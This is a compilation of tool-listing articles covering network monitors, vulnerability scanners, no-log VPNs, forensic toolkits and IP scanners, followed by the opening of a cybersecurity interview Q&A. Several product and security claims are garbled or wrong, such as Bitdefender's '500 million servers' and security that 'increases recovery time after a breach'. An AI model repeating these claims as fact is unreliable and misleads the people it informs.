EtherApe is a graphical network monitoring solution. It supports Ethernet, FDDI, ISDN, SLIP, PPP, and WLAN devices. EtherApe allows you to select the level of the protocol stack to concentrate on.
Features:
You can use refined data network filter with the help of pcap syntax
The display is averaging and node persistence times are fully configurable
Helps you to display protocol summary dialog shows global traffic statistics by the protocol
Download link: https://etherape.sourceforge.io/
10) SolarWinds
SolarWinds offers advanced network monitoring for on-premises, hybrid, and cloud services. The tool helps you to reduce network outages and improve the performance of your network.
Features:
Multi-vendor network monitoring
Network Insights for deeper visibility
NetPath and PerfStack for easy troubleshooting
Smarter scalability for large environments
Download link: https://www.solarwinds.com/network-management-software
11) PRTG monitor
PRTG monitor allows all systems, devices, traffic, and applications of your IT infrastructure. The tool also offers to monitor several networks from various locations.
Features:
Full featured web interface which is based on AJAX with high-security standards
SSL-secured local and remote access which can be used simultaneously
Visualize your network with the help of real time maps with real time status information
Allows you to monitors several networks in different locations
Helps you to run reports on demand or schedule regular reports
Download link: https://www.paessler.com/
13 BEST Vulnerability Assessment Scanners for Websites, Network
What is Vulnerability?
A vulnerability is cyber security term which describes the weakness in the system security design, process, implementation, or any internal control that may result in the violation of the system's security policy. In other words, the chance for intruders (hackers) to get unauthorized access.
What is Vulnerability Assessment?
Vulnerability assessment is a software testing type performed to evaluate the security risks in the software system in order to reduce the probability of a threat.
What is the importance of is vulnerability assessment in the company?
It helps you to detect security exposures before attackers find them.
You can create an inventory of network device, including system information and purpose.
It defines risk level which exists on the network.
Establish a benefit curve and optimize security investments.
Following is a handpicked list of Top Vulnerability Scanning Tools , with its popular features and website links. The list contains both open source(free) and commercial(paid) software.
1) Nessus Professional
Nessus professional is a vulnerability assessment tool for checking compliance, search sensitive data, scan IPs, and website. The tool is designed to make vulnerability assessment simple, easy, and intuitive.
Features:
It has advanced detection technology for more protection.
The tool offers complete vulnerability scanning with unlimited assessments.
It provides accurate visibility into your computer network.
Plugins which deliver timely protection benefits from new threats.
It allows you to migrate to Tenable solutions safely.
This tool deteccts SQL injection attack.
Link: https://www.tenable.com/products/nessus/nessus-professional
2) BeyondTrust
Beyond Trust is a free online vulnerability scanner that finds configuration issues, network vulnerabilities, and missing patches across applications, devices, virtual environments, and operating systems.
Features:
This tool has a user-friendly interface for streamlined vulnerability assessment, management, and content.
It provides patch management.
Improve risk management and prioritization.
The tool provides support for VMware that includes virtual image scanning.
It allows you to integrate with vCenter and scan virtual application for security.
Link: https://www.beyondtrust.com/tools/vulnerability-scanner
3) Intruder
Intruder is a cloud base network vulnerability scanner for your external infrastructure. This tool finds security weaknesses in your computer systems, to avoid data breaches.
Features:
You can synchronize your external IPs and DNS hostnames.
It is a developer-friendly software which can be integrated with Slack or Jira so that team can know security issues.
The tool has Network View that helps you to keep track of your exposed ports and services.
You can receive email and Slack notifications when scans complete, and summary PDF reports emailed on a monthly basis.
Intruder.io has more than 10,000 security checks for each vulnerability scan.
Link: https://intruder.io
4) Tripwire IP360
Tripwire IP360 protects the integrity of mission-critical systems spanning, virtual, physical DevOps, and cloud environments. It delivers critical security controls, including secure configuration management, vulnerability management, log management, and asset discovery.
Features:
Modular architecture that scales to your deployments and needs.
The tool has on prioritized risk scoring features.
It helps you to maximize your organization productivity via integrations with various tools you already use.
Accurately identify, search, and profile all assets on your network.
Link: https://www.tripwire.com/products/tripwire-ip360/
5) Wireshark
Wireshark is a tool which keeps watch on network packets and displays them in a human-readable format. The information that is retrieved via this tool can be viewed through a GUI or the TTY mode TShark Utility.
Features:
Live capture and offline analysis
Rich VoIP analysis
Compressed Gzip files can be decompressed on the fly
Output can be exported to plain text, XML, or CSV
Multi-platform: Runs on Windows, Linux, FreeBSD, NetBSD, and many others
Live data can be read from PPP/HDLC, internet, ATM, Blue-tooth, Token Ring, USB, and more.
Decryption support for many protocols that include IPsec, ISAKMP, SSL/TLS, WEP, and WPA/WPA2
For quick, intuitive analysis, coloring rules can be applied to the packet
Read or write many different capture file formats like Cisco Secure IDS iplog, Pcap NG, and Microsoft Network Monitor, etc.
Link: https://www.wireshark.org/
6) Paessler
Paessler security vulnerability assessment tool has an advanced infrastructure management capability. The tool monitors IT infrastructure using technologies like SNMP, WMI, Sniffing, REST APIS, SQL, and others.
Features:
You can monitor jFlow, sFlow, IP SLA, Firewall, IP, LAN, Wi-Fi, Jitter, and IPFIX.
It provides alerts via email, plays alarm audio files, or triggering HTTP requests.
The tool provides Multiple user web interfaces.
It has automated failover handling.
You can visualize your network using maps.
Paessler allows you to monitor networks in various location.
You can get the numbers, statistics, and graphs for the data you are going to monitor or configuration.
Link: https://www.paessler.com/network-security-monitoring
7) OpenVAS
OpenVAS is a vulnerability scanner that helps you to perform authenticated testing, unauthenticated testing, industrial protocols, and various high level and the low-level Internet and industrial protocols.
Features:
You can perform vulnerability tests with a long history and daily updates.
Includes more than 50,000 vulnerability tests.
It provides performance tuning and internal programming code to implement any type of vulnerability test you want to perform.
Link: http://www.openvas.org/
8) Aircrack
Aircrack is one of the handy tools required to check vulnerability and to make your Wi-Fi network secure. This tool is powered by WEP WPA and WPA 2 encryption Keys which solve vulnerable wireless connections problems.
Features:
More cards/drivers supported
Provide support to all types of OS and platforms
New WEP attack: PTW
Support for WEP dictionary attack
Protect you from Fragmentation attack
Improved tracking speed
Link: https://www.aircrack-ng.org/
9) Comodo HackerProof
Comodo HackerProof revolutionizes the way you test your website and app security. It includes PCI Scanning and site inspector for website scanning.
Features:
The tool is built with the latest technology that invites more interaction, building trust for any web site.
Comodo allows the user to present credentials on your website.
This software product provides more website credibility without changing the layout of web pages.
100+ people are associated with Comodo brand.
Not vulnerable to popup blockers
It uses rollover functionality to tell visitors that the website is trusted.
Software interrupts your website visitors to take any actions and steal your valuable business.
Link: https://www.comodo.com/hackerproof/
10) Microsoft Baseline Security Analyzer (MBSA)
Microsoft Baseline Security Analyzer (MBSA) provides a streamlined procedure to find common security misconfigurations and missing security updates.
Features:
MBSA scan for update rollups, missing security updates, and service packs available from Microsoft Update.
The download is available for various languages like English, German, Japanese, and French.
This tool includes a command-line interface and graphical user interface that performs a local or remote scan of Microsoft Windows Systems.
Scans agent computer system and inform about missing security patches.
Places the required MBSA binaries on all MOM agents.
Link: https://www.microsoft.com/en-us/download/search.aspx?q=MBSA
11) Nikto
Nikto analysis web servers for 6700+ potentially dangerous programs. This tool checks for server configuration items such as HTTP server options, the presence of multiple index files, and will attempt to identify installed web servers and software.
Features:
Full HTTP proxy support
The tool automatically finds outdated server components.
Save reports in HTML, plain text, CSV, XML, or NBE.
It has a template engine for easy report customization.
Scan multiple servers or multiple ports on a server.
Host authentication with Basic, and NTLM.
Authorization guessing handles any directory.
Link: https://cirt.net/Nikto2
12) Solarwinds Configuration Manager
Solarwinds Configuration Manager is a software which is used to handle configs through policy management, backup, and automation. This tool reduces the time needed to manage critical changes and repetitive tasks across complex, multi-vendor networks.
Features:
You can locate the current configuration and instantly apply it to a replacement spare, or to roll back a blown configuration.
Protect your Cisco devices from malware.
It provides effective troubleshooting and network management to your Palo Alto Networks firewall.
The tool detects faults, identify, and corrects a range of configuration errors.
You can know devices connected to the network, their hardware, and software configurations.
Control who can view device details and make configuration changes and determine when network changes can occur.
Link: https://www.solarwinds.com/network-configuration-manager
13) Nexpose Community
Nexpose is a useful vulnerability management software. With this tool, you can monitor exposure in real time and adapts to new threats with fresh data.
Features:
Get a real-time view of risk.
It brings innovative and progressive solutions that help the user to get their jobs done.
Know where to focus.
Bring more to your security program
Provide IT with necessary details they have to fix any issues.
Link: https://www.rapid7.com/products/nexpose/
Best 16 No-Log VPN (2020 Update)
No log VPN tools do not exchange user information using the network. Log less software provides a secure way to connect devices over the internet. These software does not store your data, so they are reliable even if your network is compromised.
Following is a handpicked list of top no-log VPN tools, with popular features and latest download links.
1) PureVPN
PureVPN tool provides a safe way to access anything on the internet. Using this tool, you can stay protected while you browse the internet. PureVPN does not store your VPN IP, and specific time you connect to the server.
Features:
It has 2,000+ servers in more than 140 countries.
The software provides unlimited bandwidth.
Allows split tunneling in which you can choose the data connection method, through VPN or ISP.
Friendly live support for 24-hours
Provides P2P enabled services by optimizing servers with a secure file share.
Download link: https://www.purevpn.com/
2) SaferVPN
SaferVPN provides seamless VPN apps for Windows, iOS, Mac, Android, Firefox, and Chrome. It allows you to hide your personal information. SaferVPN protects from snoopers, hackers, and cyber scams.
Features:
It has 700+ high-speed servers in 34+ countries.
This software does not log Your VPN and source IP address, DNS queries, metadata, and browsing history.
Helps you to protect all of your valuable data and personal information over any unsecured public Wi-Fi hotspot
Allows you to access blocked sites, online streams, apps games, and smart TVs from anywhere in the world.
Provides unlimited server switching.
Helps you to call other people securely using apps like Telegram, Whatsapp, and Viber.
Download link: https://www.safervpn.com/
3) NordVPN
NordVPN is a software which does not track, collect, or share data. It is available on Android, Windows, Apple, macOS, and Linux. You can enjoy fast connection without buffering.
Features:
5700 NordVPN servers in more than 60 countries
This software does not store session information, used bandwidth, IP addresses, traffic data, and session details
Provides double VPN or onion over VPN.
NordVPN does not keep log activity online.
Offers 24/7 product support.
Download link: https://nordvpn.com
4) ExpressVPN
ExpressVPN secures internet browsing against three-letter agencies and scammers. It offers unlimited access to music, social media, and video such that these programs never log IP addresses, browsing history, DNS queries, or traffic destination.
Features:
Servers in 160 locations and 94 countries
Connect to the VPN without any bandwidth limitation.
Provides online protection using leak proofing and encryption.
Stay secure by hiding IP address and encrypting your network data.
Assistance is available 24/7 via email as well as live chat.
Pay with Bitcoin and use Tor in order to access hidden sites.
Download link: https://www.expressvpn.com/
5) CyberGhost
CyberGhost software provides you secure P2P torrenting. You can unblock all streaming services. It allows you to encrypt your online connection and boosts your security as well as digital privacy. CyberGhost tool automatically protects whenever you connect to a new internet connection.
Features:
Having 4900 servers in more than 59 countries
Allows access to NoSpy server.
Encrypt data using the latest 256-bit AES encryption technique
Allows you to connect seven devices simultaneously
Provides unlimited bandwidth
CyberGhost VPN allows you to put your privacy first and protects you against data miners and hackers.
Download link: https://www.cyberghostvpn.com/en_US/
6) Surfshark
Surfshark provides fast and secure access to web content. It makes your location private and keeps your sensitive data secure. This software offers secure tunneling protocols like OpenVPN and IKEv2.
Features:
More than 800 servers in 50+ countries
Allow particular apps & websites to bypass the VPN
Protect your confidentiality by hiding your real IP address
This software does not log your IP, WebRTC, and prevent DNS leaks.
Download link: https://surfshark.com
7) ProtonVPN
ProtonVPN enables you to use the web anonymously, unblock websites & encrypt your internet connection. It uses a high-speed Swiss VPN server that protects your privacy.
Features:
More than 436 servers, available in 33+ countries.
It has ciphers with Perfect Forward Secrecy for better encryption.
Anonymous VPN service allows you to use the Internet without surveillance.
It can integrate with the tor anonymity network.
Pass user traffic through a secure core network in countries like Iceland and Switzerland.
Download link: https://protonvpn.com/
8) Unlocator
Unlocator allows you to surf the internet by maintaining privacy without any restriction. Whenever you use this software, your network connection becomes encrypted, and all your network activity remains secure.
Features:
Unlocator has servers in 36 countries
It supports 58 devices and platforms.
Allows you One-Click Privacy and Security
Offers privacy of VPN with the ease of Smart DNS streaming
Protect your privacy effectively with no IP DNS, or WebRTC leaks.
Download link: https://unlocator.com/
9) Astrill
Astrill is another no-log VPN software that allows you to share VPN connection with multiple devices on your home network, including Xbox, Roku Boxes, PS4, and Boxee. It allows you to connect your whole home or office to VPN with 5 simultaneous connections.
Features:
Servers in more than 113 cities and 64 countries
SSL encryption to secure network traffic
Connect devices to any server
Offer unlimited server switches
Helps your Internet traffic is protected from any hackers and spies via SSL encryption
Software supports BitCoin
Download link: https://www.astrill.com/
10) VPN Unlimited
VPN Unlimited provides security, whatever you use credit cards data or personal passwords. It protects your personal data from third parties and hackers. It is an effective way of establishing safe virtual connections to its secure servers.
Features:
It has more than 400 super-fast servers.
Servers in 70+ locations
Connect up to up to 5 devices
Protects your privacy, changing your IP address.
Provides total security, whatever you use Wi-Fi.
Download link: https://www.vpnunlimitedapp.com/en
11) F-Secure Freedom
F-Secure Freedom hides your IP address by relocating it to another location. This software secures online banking, e-commerce transactions, taxes, browsing, and streaming. It also offers you to access geo-blocked content.
Features:
Provides unlimited bandwidth
F-Secure provides access to geo-blocked content with no hassle
No registration or account needed to use this software.
Prevents your internet provider from tracking you and your online activities.
Download link: https://www.f-secure.com/en/home/products/freedome
12) HexaTech
HexaTech offers safe, private access to all your content across the world. With the help of HexaTech VPN, you will get secure connections with military-grade encryption to protect you from various cyber-attacks.
Features:
Access Wi-Fi networks securely
Block annoying advertisers, your ISP, hackers from tracking you online for the private online experience.
Automatically blocks all the online threat.
Offers Intelligent web taking preventative
No Registration or Logging is needed to use this tool
Download link: https://www.hexatechvpn.com/
13) Bitdefender VPN
Bitdefender VPN is security software which is recognized by computer experts and independent labs. It gives real-world protection to your network. This software helps you to keep home and enterprise protected against cyber threats.
Features:
500 million servers in more than 150 countries.
Prevent all types of IP leak.
Does not have any data retention law
Cloud-based centralized control for multiple devices
Prevents malicious software and hackers attempting vulnerabilities in your system
Download link: https://www.bitdefender.com/
14) Browsec
Browsec allows you to access any site, anywhere. This software protects your data from sniffers. It offers anonymous browsing on various devices, including a computer, iOS, or Android mobile device. It is a compatible tool with all the major browser like Chrome, Firefox, and Opera.
Features:
Having 36 countries and more than 400 servers
Access geo-restricted content
Provide fast email support
If the VPN server is not available, it kills the connection for the security purpose.
It has smart settings feature which allows you to hide your identity when visiting certain websites.
Download link: https://browsec.com/en/
15) Hidemyass
Hidemyass provides secure banking transactions. You can get VPN protection for your IoT network. It enables users to remain anonymous and encrypt online traffic. Hidemyass is a dedicated no-log VPN tool for streaming and P2P sharing.
Features:
It has 980+ VPN servers in more than 290 location.
Allows browsing using secure public Wi-Fi.
Provides privacy by hiding your searches and browsing history.
Unblock restricted content without any hassle
Download link: https://www.hidemyass.com/en-in/index
16) TigerVPN
TigerVPN allows you to access services that you would like to block content or bypass censorship that may not be available otherwise. This software provides geo unblocking.
Features:
It has 300 VPN servers in 62 locations
It provides quick and efficient customer support via live chat
It helps you to improve your internet speed on gaming or streaming.
Meshed IP addresses in order to enhanced privacy
Allows you to protect all devices at the same time
Download link: https://www.tigervpn.com/
15 BEST Digital Forensic Tools in 2020 [Free/Paid]
Digital forensic is a process of preservation, identification, extraction, and documentation of computer evidence which can be used by the court of law. There are many tools that help you to make this process simple and easy. These applications provide complete reports that can be used for legal procedures.
Following is a handpicked list of Digital Forensic Toolkits, with their popular features and website links. The list contains both open source(free) and commercial(paid) software.
1) ProDiscover Forensic
ProDiscover Forensic is a computer security app that allows you to locate all the data on a computer disk. It can protect evidence and create quality reports for the use of legal procedures. This tool allows you to extract EXIF(Exchangeable Image File Format) information from JPEG files.
Features:
This product supports Windows, Mac, and Linux file systems.
You can preview and search for suspicious files quickly.
It creates a copy of the entire suspected disk to keep the original evidence safe.
This tool helps you to see internet history.
You can import or export .dd format images.
It enables you to add comments to evidence of your interest.
ProDiscover Forensic supports VMware to run a captured image.
Link: https://www.prodiscover.com
2) Sleuth Kit (+Autopsy)
Sleuth Kit (+Autopsy) is a Windows based utility tool that makes forensic analysis of computer systems easier. This tool allows you to examine your hard drive and smartphone.
Features:
You can identify activity using a graphical interface effectively.
This application provides analysis for emails.
You can group files by their type to find all documents or images.
It displays a thumbnail of images to quick view pictures.
You can tag files with the arbitrary tag names.
The Sleuth Kit enables you to extract data from call logs, SMS, contacts, etc.
It helps you to flag files and folders based on path and name.
Link: https://www.sleuthkit.org
3) CAINE
CAINE is a Ubuntu-based app that offers a complete forensic environment that provides a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.
Features:
It supports the digital investigator during the four phases of the digital investigation.
It offers a user-friendly interface.
You can customize features of CAINE.
This software offers numerous user-friendly tools.
Link: https://www.caine-live.net
4) PALADIN
PALADIN is Ubuntu based tool that enables you to simplify a range of forensic tasks. It provides more than 100 useful tools for investigating any malicious material. This tool helps you to simplify your forensic task quickly and effectively.
Features:
It provides both 64-bit and 32-bit versions.
This tool is available on a USB thumb drive.
This toolbox has open-source tools that help you to search for the required information effortlessly.
This tool has more than 33 categories that assist you in accomplishing a cyber forensic task.
Link: https://sumuri.com/software/paladin/
5) EnCase
Encase is an application that helps you to recover evidence from hard drives. It allows you to conduct an in-depth analysis of files to collect proof like documents, pictures, etc.
Features:
You can acquire data from numerous devices, including mobile phones, tablets, etc.
It enables you to produce complete reports for maintaining evidence integrity.
You can quickly search, identify, as well as prioritize evidence.
Encase-forensic helps you to unlock encrypted evidence.
It automates the preparation of evidence.
You can perform deep and triage (severity and priority of defects) analysis.
Link: https://www.guidancesoftware.com/encase-forensic
6) SANS SIFT
SANS SIFT is a computer forensics distribution based on Ubuntu. It provides a digital forensic and incident response examination facility.
Features:
It can work on a 64-bit operating system.
This tool helps users to utilize memory in a better way.
It automatically updates the DFIR (Digital Forensics and Incident Response) package.
You can install it via SIFT-CLI (Command-Line Interface) installer.
This tool contains numerous latest forensic tools and techniques.
Link: https://digital-forensics.sans.org/community/downloads/
7) FTK Imager
FTK Imager is a forensic toolkit i developed by AccessData that can be used to get evidence. It can create copies of data without making changes to the original evidence. This tool allows you to specify criteria, like file size, pixel size, and data type, to reduce the amount of irrelevant data.
Features:
It provides a wizard-driven approach to detect cybercrime.
This program offers better visualization of data using a chart.
You can recover passwords from more than 100 applications.
It has an advanced and automated data analysis facility.
FTK Imager helps you to manage reusable profiles for different investigation requirements.
It supports pre and post-processing refinement.
Link: https://accessdata.com/products-services/forensic-toolkit-ftk
8) Magnet RAM capture
Magnet RAM capture records the memory of a suspected computer. It allows investigators to recover and analyze valuable items which are found in memory.
Features:
You can run this app while minimizing overwritten data in memory.
It enables you to export captured memory data and upload it into analysis tools like magnet AXIOM and magnet IEF.
This app supports a vast range of Windows operating systems.
Magnet RAM capture supports RAM acquisition.
Link: https://www.magnetforensics.com/resources/magnet-ram-capture/
9) X-Ways Forensics
X-Ways is software that provides a work environment for computer forensic examiners. This program is supports disk cloning and imaging. It enables you to collaborate with other people who have this tool.
Features:
It has ability to read partitioning and file system structures inside .dd image files.
You can access disks, RAIDs (Redundant array of independent disk), and more.
It automatically identifies lost or deleted partitions.
This tool can easily detect NTFS (New Technology File System) and ADS (Alternate Data Streams).
X-Ways Forensics supports bookmarks or annotations.
It has the ability to analyze remote computers.
You can view and edit binary data by using templates.
It provides write protection for maintaining data authenticity.
Link: http://www.x-ways.net/forensics/
10) Wireshark
Wireshark is a tool that analyzes a network packet. It can be used to for network testing and troubleshooting. This tool helps you to check different traffic going through your computer system.
Features:
It provides rich VoIP (Voice over Internet Protocol) analysis.
Capture files compressed with gzip can be decompressed easily.
Output can be exported to XML (Extensible Markup Language), CSV (Comma Separated Values) file, or plain text.
Live data can be read from the network, blue-tooth, ATM, USB, etc.
Decryption support for numerous protocols that include IPsec (Internet Protocol Security), SSL (Secure Sockets Layer), and WEP (Wired Equivalent Privacy).
You can apply intuitive analysis, coloring rules to the packet.
Allows you to read or write file in any format.
Link: https://www.wireshark.org
11) Registry Recon
Registry Recon is a computer forensics tool used to extract, recover, and analyze registry data from Windows OS. This program can be used to efficiently determine external devices that have been connected to any PC.
Features:
It supports Windows XP, Vista, 7, 8, 10, and other operating systems.
This tool automatically recovers valuable NTFS data.
You can integrate it with the Microsoft Disk Manager utility tool.
Quickly mount all VSCs (Volume Shadow Copies) VSCs within a disk.
This program rebuilds the active registry database.
Link: https://arsenalrecon.com/products/
12) Volatility Framework
Volatility Framework is software for memory analysis and forensics. It helps you to test the runtime state of a system using the data found in RAM. This app allows you to collaborate with your teammates.
Features:
It has API that allows you to lookups of PTE (Page Table Entry) flags quickly.
Volatility Framework supports KASLR (Kernel Address Space Layout Randomization).
This tool provides numerous plugins for checking Mac file operation.
It automatically runs Failure command when a service fails to start multiple times.
Link: https://www.volatilityfoundation.org
13) Xplico
Xplico is an open-source forensic analysis app. It supports HTTP( Hypertext Transfer Protocol), IMAP (Internet Message Access Protocol), and more.
Features:
You can get your output data in the SQLite database or MySQL database.
This tool gives you real time collaboration.
No size limit on data entry or the number of files.
You can easily create any kind of dispatcher to organize the extracted data in a useful way.
It supports both IPv4 and IPv6.
You can perform reserve DNS lookup from DNS packages having input files.
Xplico provides PIPI (Port Independent Protocol Identification) feature to support digital forensic.
Link: https://www.xplico.org
14) e-fense
E-fense is a tool that helps you to meet your computer forensics and cybersecurity needs. It allows you to discover files from any device in one simple to use interface.
Features:
It gives protection from malicious behavior, hacking, and policy violations.
You can acquire internet history, memory, and screen capture from a system onto a USB thumb drive.
This tool has a simple to use interface that enables you to achieve your investigation goal.
E-fense supports multithreading, that means you can execute more than one thread simultaneously.
Link: http://www.e-fense.com/products.php
15) Crowdstrike
Crowdstrike is digital forensic software that provides threat intelligence, endpoint security, etc. It can quickly detect and recover from cybersecurity incidents. You can use this tool to find and block attackers in real time.
Features:
This tool helps you to manage system vulnerabilities.
It can automatically analyze malware.
You can secure your virtual, physical, and cloud-based data center.
Link: https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-pro/
YOU MIGHT LIKE:
ETHICAL HACKING
13 BEST Vulnerability Assessment Scanners for Websites, Network
What is Vulnerability? A vulnerability is cyber security term which describes the weakness in the...
ETHICAL HACKING
Skills Required to Become a Ethical Hacker
Skills allow you to achieve your desired goals within the available time and resources. As a...
ETHICAL HACKING
What is Digital Forensics? History, Process, Types, Challenges
What is Digital Forensics? Digital Forensics is defined as the process of preservation,...
ETHICAL HACKING
17 Best IP & Network Scanning Tools in 2020 (Free/Paid)
IP and Network scanning tools are software that identify various loopholes of network and...
ETHICAL HACKING
Top 110 Cyber Security Interview Questions & Answers
Following are frequently asked questions in interviews for freshers as well as experienced cyber...
ETHICAL HACKING
Wireshark Tutorial: Network & Passwords Sniffer
Computers communicate using networks. These networks could be on a local area network LAN or...
Ethical Hacking
17 Best IP & Network Scanning Tools in 2020 (Free/Paid)
IP and Network scanning tools are software that identify various loopholes of network and safeguard from unprecedented and abnormal behavior that poses a threat to the system. It provides a convenient way to secure your computer network.
Following is a handpicked list of Top IP Scanners, with its popular features and website links. The list contains both open source(free) and commercial(paid) software.
1) Skyboxsecurity
Skyboxsecurity provides you seamless network visibility across IT, multi-cloud, and physical environments. This tool is designed to support complex enterprise and large networks.
Features:
This tool helps you to interact with a model of network topology, security controls, and assets.
Solve network connectivity related issues and find the root causes of network outages to ensure business continuity and continuous uptime.
You can keep security zones and device configurations in continuous compliance.
Link: https://www.skyboxsecurity.com/
2) Thousandeyes
ThousandEyes networking monitoring software allows you to find the cause of problems anywhere. It monitors network infrastructure, troubleshoots application delivery, and maps Internet performance.
Features:
Visualize multiple layers of network data to check diverse infrastructure, services, and apps
You can See app delivery across every network.
Integrate data directly into your existing workflows and systems.
Rapidly diagnose, triage, and find problems with real-time performance data.
You can collaborate with your service providers by sharing interactive data sets.
Link: https://www.thousandeyes.com/network-intelligence
3) Beyondtrust
Beyond Trust is a free online network scanning tool that finds configuration issues, and missing patches across applications, devices, virtual environments, and operating systems.
Features:
This tool has a user-friendly interface that simplifies integrations and enhances the productivity of your business.
It provides patch management.
Improve risk management and prioritization.
The tool provides support for VMware that includes virtual image scanning.
It allows you to integrate with vCenter and scan virtual applications for security.
Link: https://www.beyondtrust.com/
4) Qualys
Qualys helps businesses streamline their security and compliance solutions. It also builds security into their digital transformation initiatives. This tool can also check the performance of the online cloud systems.
Features:
Data are securely stored and processed on an n-tiered architecture of load-balanced servers.
You do not require hardware to install and manage data.
It is a scalable, end-to-end solution for all aspects of IT security.
Qualys analyzed data in real time.
It can respond to threats in real-time.
Link: https://www.qualys.com/
5) Paessler
Paessler security network scanning tool has an advanced infrastructure management capability. This software helps you to monitors IT infrastructure using technologies like SNMP, WMI, Sniffing, REST APIS, SQL, and others.
Features:
You can get the numbers, statistics, and graphs for the data you are going to monitor or configuration.
It has automated failover handling.
The tool provides Multiple user web interfaces.
You can visualize your network using maps.
Paessler allows you to monitor networks in various locations.
It provides alerts via email, plays alarm audio files, or triggering HTTP requests.
You can monitor jFlow, sFlow, IP SLA, Firewall, IP, LAN, Wi-Fi, Jitter, and IPFIX.
Link: https://www.paessler.com/network_monitoring_tool
6) Spiceworks
Spice works is an easy to use network monitoring tool which offers real-time status and alerts for your critical devices.
Features:
It is simple and easy to install software applications.
You can adjust alert thresholds for in-app notifications or emails.
Support is entirely free. Online or on the phone, chat
Get quick insights and spot slow, sluggish, or overwhelmed systems.
Link: https://www.spiceworks.com/download/monitor/
7) Site24x7
Site24x7 is an integrated tool for cloud monitoring, website performance, application, and server monitoring tool. It is designed especially for IT and DevOps to enhance user experiences when accessing websites from various devices.
Features:
It automatically searches all the devices available within a provided IP range.
Supports more than 200 vendors, including Canon, Cisco, HP, Dell.
You can configure network devices to send SNMP alert message.
It has 4000+ customizable device templates.
You can see top devices based on response time and packet loss.
This tool automates mapping with Layer 2 maps.
Link: https://www.site24x7.com/tools.html
8) Nagios
Nagio is an open-source software product for continuous monitoring. It enables you to analyze network, and infrastructure, and system. It is used for continuous monitoring of systems, applications, services, and business processes in a DevOps culture.
Features:
It helps you to define network host hierarchy using parent hosts.
This tool automatically sends alerts if the condition changes.
Nagios enables you to read its configuration from an entire directory, which helps you to decide how to define individual files.
It supports for implementing redundant monitoring hosts.
You can monitor network protocols like HTTP, SMTP, POP, SSH, FTP, etc.
This tool offers your network a high degree of scalability, and visibility helping you to solve issues related to multiple networks.
Link: https://www.nagios.org/
9) Nessus
Nessus is a network scanning tool for analyzing compliance, search sensitive data, website traffic, and scan IPs. This application is designed to make the process of the network scanning process easy and intuitive.
Features:
You can secure your cloud, OT (Operational Technology) devices, and traditional IT assets.
The tool provides complete network scanning with unlimited assessments.
It offers accurate visibility into your computer network.
Supports many plugins that deliver timely protection from new threats.
It enables you to migrate to reliable solutions safely.
This tool detects the SQL injection attack.
Link: https://www.tenable.com/products/nessus
10) GFI Software
Gif Software allows you to scan your mobile devices and computer network for vulnerabilities. It provides patch management for Windows, Linux, and Mac OS.
Features:
It provides patch management for third-party applications as well as the operating system.
Web reporting console
Track latest network problem and missing updates
Integration with security applications
Support for Virtual Environments
Link: https://www.gfi.com/products-and-solutions/network-security-solutions
11) Advanced IP Scanner
Advanced IP scanner is a free application that allows you to access shared folders, remote controlling of computers, and can even turn PC on and off.
Features:
Use this software without installing it.
This tool detects MAC addresses.
You can export the scanned result to CSV file.
It provides remote control via remote desktop protocol.
You can turn on or off any computer remotely.
You can easily access from shared networked.
Link: http://www.advanced-ip-scanner.com/
12) Domotz
Domotz is a tool which helps to analyzes advanced network data and helps you to manage remote network. This application can troubleshoot multiple networks and prevents information from technology-related issues.
Features:
It allows you to monitor any type and number of devices.
This software automatically discovers devices on the network.
It monitors a range of events and device attributes and provides alerts.
It provides on-demand and scheduled speed tests.
Domotz gives up to date reporting on data like WiFi signal level, noise value reporting, and health measures.
You can connect your device remotely and resolve issues.
Link: https://www.domotz.com/features.php
13) Essential NetTools
Essential NetTools is a collection of network scanning, administrator, security, and tools. These tools help you to scan an active network port within a specific range of IP addresses.
Features:
It displays PC's network connections, including the information on UDP, and open TCP ports.
You can scan a network within a given range of IP addresses.
It can monitor and logs external connections to your PC's shared resources.
It allows you to perform many security checks on your network and individual computers.
It automatically checks if a host computer is alive and running network services.
Essential NetTools displays the list of running processes with necessary details on the manufacturer, process ID, and program location.
Link: https://www.tamos.com/download/main/
14) Logicmonitor
LogicMonitor traces your applications' predefined data sources to monitor, graph, and alert you about all the trends and events in a single resource for effective application management.
Features:
You can work with Windows or Linux operating systems.
Get alerts from any browser.
This tool provides email, phone, and SMS alerts.
Alert routing to notify specific groups.
It offers performance graphs.
You can manage users according to the role.
Link: https://www.logicmonitor.com/network-monitoring/
15) Nikto2
Nikto analysis web servers for more than 7000 potentially dangerous applications. This tool identifies server configuration items, such as the presence of multiple index files and HTTP server options.
Features:
It provides HTTP proxy support
The tool automatically searches outdated server components.
You can save reports in plain text, HTML, XML, NBE, or CSV.
It provides a template engine for report customization.
It allows you to scan multiple servers and ports.
Host authentication with Basic and NTLM.
Authorization guessing handles any directory.
Link: https://cirt.net/Nikto2
16) SoftPerfect Network Scanner
Features:
It supports both IPV4 and IPV6.
SoftPerfect network scanner detects hardware MAC-addresses and internal or external IP addresses.
You can get system information via remote registry, WMI (Windows Management Instrumentation) file system, and service manager.
Scan for TCP ports, UDP, and SNMP services.
It enables you to export result to XML JSON, HTML, TXT, and CSV format.
This software can be run from a USB flash drive without setup.
Link: https://www.softperfect.com/products/networkscanner/
17) Rapid7
Nexpose Rapid 7 monitors your network in real time and finds new threats. It collects data from your computer and makes it easy for you to manage malicious activity.
Features:
It provides a real time view of risk.
This tool provides the necessary details to fix any network issues.
It automatically detects and assesses new devices
You can integrate it with the Metasploit penetration testing framework.
Link: https://www.rapid7.com/products/nexpose/
Top 110 Cyber Security Interview Questions & Answers
Following are frequently asked questions in interviews for freshers as well as experienced cyber security certification candidates.
1) What is cybersecurity?
Cybersecurity refers to the protection of hardware, software, and data from attackers. The primary purpose of cyber security is to protect against cyberattacks like accessing, changing, or destroying sensitive information.
2) What are the elements of cybersecurity?
Major elements of cybersecurity are:
Information security
Network security
Operational security
Application security
End-user education
Business continuity planning
3) What are the advantages of cyber security?
Benefits of cyber security are as follows:
It protects the business against ransomware, malware, social engineering, and phishing.
It protects end-users.
It gives good protection for both data as well as networks.
Increase recovery time after a breach.
Cybersecurity prevents unauthorized users.
4) Define Cryptography.
It is a technique used to protect information from third parties called adversaries. Cryptography allows the sender and recipient of a message to read its details.
5) Differentiate between IDS and IPS.
Intrusion Detection System (IDS) detects intrusions. The administrator has to be careful while preventing the intrusion. In the Intrusion Prevention System (IPS), the system finds the intrusion and prevent it.
6) What is CIA?
Confidentiality, Integrity, and Availability (CIA) is a popular model which is designed to develop a security policy. CIA model consists of three concepts:
